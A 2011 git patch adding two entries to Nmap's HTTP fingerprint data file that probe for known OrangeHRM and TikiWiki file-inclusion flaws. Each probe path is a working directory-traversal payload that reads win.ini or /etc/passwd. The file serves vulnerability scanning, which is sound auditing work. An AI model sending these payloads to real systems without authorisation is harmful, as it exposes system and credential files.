From 248b53abfaea6d693e674dfa401c6b940f6c8f6e Mon Sep 17 00:00:00 2001
From: paulino <paulino@e0a8ed71-7df4-0310-8962-fdc924857419>
Date: Sat, 9 Jul 2011 20:44:22 +0000
Subject: [PATCH] Adds entries under 'attack' for: -OrangeHRM:
 http://www.exploit-db.com/exploits/17212/ -Tikiwiki:
 http://www.exploit-db.com/exploits/1244/

---
 nselib/data/http-fingerprints.lua | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/nselib/data/http-fingerprints.lua b/nselib/data/http-fingerprints.lua
index e293b6db6..4edc3341f 100644
--- a/nselib/data/http-fingerprints.lua
+++ b/nselib/data/http-fingerprints.lua
@@ -2702,6 +2702,26 @@ table.insert(fingerprints, {
                  {match='200', output='Cute Editor ASP.NET Remote File Disclosure ( CVE 2009-4665 )'}
         }
 })
+
+table.insert(fingerprints, {
+ category='attacks',
+        probes={
+         {path='/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00', method='GET'}
+ },
+        matches={
+                 {match='200', output='OrangeHRM 2.6.3 Local File Inclusion '}
+        }
+})
+
+table.insert(fingerprints, {
+ category='attacks',
+        probes={
+         {path='/tiki-listmovies.php?movie=../../../../../../etc/passwd%001234', method='GET'}
+ },
+        matches={
+                 {match='200', output='TikiWiki < 1.9.9 Directory Traversal Vulnerability'}
+        }
+})
 ------------------------------------------------
 ----        Open Source CMS checks          ----
 ------------------------------------------------